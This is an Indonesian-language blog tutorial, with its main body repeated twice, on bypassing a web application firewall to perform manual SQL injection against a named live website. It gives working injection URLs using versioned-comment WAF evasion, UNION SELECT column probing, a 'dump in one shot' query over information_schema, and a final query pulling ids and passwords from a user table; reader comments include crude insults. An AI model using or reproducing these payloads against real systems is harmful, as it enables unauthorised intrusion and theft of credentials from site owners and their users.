Balik Lagi Bersama ane Mr.Who oke sakarang gw bakal ngasih tutor gmn cara Bypass WAF 403 Forbidden SQL Injection Manual. Bagi yang gk tau apa itu WAF, Waf adalah Web Application Firewall yang digunakan untuk keamanan website singkatnya. Gw anggap aja kalian dah punya target atau kalian bisa pakek live target
nih : http://www.gilabet88.org/detailnews.php?id=810
Yok langsung saja ke tutorial nya.
1. Setelah kalian cek apakah web tersebut vuln terhadap SQL Injection, kalian masukkan order by untuk mengetahui jumlah kolom web itu. Pada saat gw masukin perintah order by, muncul lah pesan kayak di gambar dibawah. http://www.gilabet88.org/detailnews.php?id=810%27+order+by+1--+
2. Kode untuk membypass nya adalah :
/*50000...*/+/*50000...*/
/*12345...*/+/*12345...*/
Kalian cukup tambahkan ke perintah Order by nya. Kalo kurang jelas bisa lihat gambar. Dan bum terbypass. http://www.gilabet88.org/detailnews.php?id=810%27+/*!50000order*/+/*!50000by*/+1--+
3. Setelah gw order, ternyata cuman sampek 10.http://www.gilabet88.org/detailnews.php?id=810%27+/*!50000order*/+/*!50000by*/+11--+
4. Skarang ganti order by nya menjadi union select jangan lupa tambahin tanda . sesudah id=
Contoh : http://www.gilabet88.org/detailnews.php?id=.810%27+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,10--+
Setelah itu muncul lah angka togel nya :v
5. Skarang kita dios buat ngelihat database nya. Masukin make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) menggantikan angka 2 tdi. Contoh : http://www.gilabet88.org/detailnews.php?id=.810%27+/*!50000union*/+/*!50000select*/+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4,5,6,7,8,9,10--+ dan ternyata Forbidden lagi.
6. Tadikan gw sudah membypass order by sama union select nya. Nah skarang gw coba bypass dios nya. /*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/)),@)
Contoh : http://www.gilabet88.org/detailnews.php?id=.810%27+/*!50000union*/+/*!50000select*/+1,/*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/)),@),3,4,5,6,7,8,9,10--+ Dan bum bisa lagi :v
7. Skarang kita cari user sama pass nya. Ganti kode dios tdi dengan kode
Contoh : /*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000tb_user*/)where@:=make_set(511,@,0x3c6c693e,/*!50000id*/,/*!50000password*/)),@)
Contoh : http://www.gilabet88.org/detailnews.php?id=.810%27+/*!50000union*/+/*!50000select*/+1,/*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000tb_user*/)where@:=make_set(511,@,0x3c6c693e,/*!50000id*/,/*!50000password*/)),@),3,4,5,6,7,8,9,10--+
Nah keliatan kan username sama password nya :v
Oke Sekian Dan Terima Kasih Dan Jangan Lupa Subscribe Chennel Youtube Anee Gan ada tutorial menarik buat kalian dan kalian juga bisa request tutorial apa yang perlu anda ketahui jangan lupa susbcribe and share : rzqmlnID
nih : http://www.gilabet88.org/detailnews.php?id=810
Yok langsung saja ke tutorial nya.
1. Setelah kalian cek apakah web tersebut vuln terhadap SQL Injection, kalian masukkan order by untuk mengetahui jumlah kolom web itu. Pada saat gw masukin perintah order by, muncul lah pesan kayak di gambar dibawah. http://www.gilabet88.org/detailnews.php?id=810%27+order+by+1--+
2. Kode untuk membypass nya adalah :
/*50000...*/+/*50000...*/
/*12345...*/+/*12345...*/
Kalian cukup tambahkan ke perintah Order by nya. Kalo kurang jelas bisa lihat gambar. Dan bum terbypass. http://www.gilabet88.org/detailnews.php?id=810%27+/*!50000order*/+/*!50000by*/+1--+
3. Setelah gw order, ternyata cuman sampek 10.http://www.gilabet88.org/detailnews.php?id=810%27+/*!50000order*/+/*!50000by*/+11--+
4. Skarang ganti order by nya menjadi union select jangan lupa tambahin tanda . sesudah id=
Contoh : http://www.gilabet88.org/detailnews.php?id=.810%27+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,10--+
Setelah itu muncul lah angka togel nya :v
5. Skarang kita dios buat ngelihat database nya. Masukin make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) menggantikan angka 2 tdi. Contoh : http://www.gilabet88.org/detailnews.php?id=.810%27+/*!50000union*/+/*!50000select*/+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4,5,6,7,8,9,10--+ dan ternyata Forbidden lagi.
6. Tadikan gw sudah membypass order by sama union select nya. Nah skarang gw coba bypass dios nya. /*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/)),@)
Contoh : http://www.gilabet88.org/detailnews.php?id=.810%27+/*!50000union*/+/*!50000select*/+1,/*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/)),@),3,4,5,6,7,8,9,10--+ Dan bum bisa lagi :v
Contoh : /*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000tb_user*/)where@:=make_set(511,@,0x3c6c693e,/*!50000id*/,/*!50000password*/)),@)
Contoh : http://www.gilabet88.org/detailnews.php?id=.810%27+/*!50000union*/+/*!50000select*/+1,/*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000tb_user*/)where@:=make_set(511,@,0x3c6c693e,/*!50000id*/,/*!50000password*/)),@),3,4,5,6,7,8,9,10--+
Nah keliatan kan username sama password nya :v
Oke Sekian Dan Terima Kasih Dan Jangan Lupa Subscribe Chennel Youtube Anee Gan ada tutorial menarik buat kalian dan kalian juga bisa request tutorial apa yang perlu anda ketahui jangan lupa susbcribe and share : rzqmlnID
Kalo databasenya cuma satu gimana gan ?
ReplyDeleteTolol
Deletekontol bapak kau databasenya satu
DeletePost a Comment
Jangan Lupa Untuk Terus Visit blog kami : https://mrwho-404.blogspot.com/?m=1